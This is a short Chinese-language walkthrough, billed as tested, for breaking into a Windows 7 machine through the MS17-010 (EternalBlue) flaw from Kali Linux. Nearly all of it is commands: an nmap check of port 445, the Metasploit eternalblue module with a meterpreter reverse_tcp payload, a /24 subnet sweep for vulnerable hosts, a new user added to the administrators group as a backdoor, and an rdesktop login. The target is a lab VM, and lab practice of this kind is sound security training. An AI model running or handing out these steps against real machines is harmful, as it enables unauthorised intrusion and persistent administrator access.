MS17-010漏洞利用工具系统入侵(实测)

一、打开kali和win7查看IP。
(1) Windows7作为靶机
(2) Kali作为攻击机（最新版kaili）
二、打开kali进入终端输入nmap +IP查看靶机是否开启445端口。
三、在kali中输入 msfconsole（等待一会可能会有点慢）
四、进入后输人search ms17-010（就是之前的永恒之蓝，也就是新闻上报道的比特币勒索病毒）

五、找到exploit windows/smb/ms17_010_eternalblue,
运行use exploitwindows/smb/ms17_010_eternalblue
六、输入show options 查看和配置RHOST（靶机）和LHOST（操作机）

由于我用的是虚拟电脑所以我环境已经配置好了。
如果你不知道那台电脑有漏洞你可以输入set LHOSTS 网关/24
如果是[+]前面是这样说明有漏洞，然后再set RHOST +IP。

七、设置TCP连接 set payload windows/x64/meterpreter/reverse_tcp
八、run或exploit进行攻击

这样就进去了。
九、可以创建用户 net user xxxx 1234 /add（xxxx用户名 1234密码）
十、net localgroup administrators xxxx /add （将用户设置为管理员权限）
十一、重新打开一个终端 rdesktop+IP

这样就进去了。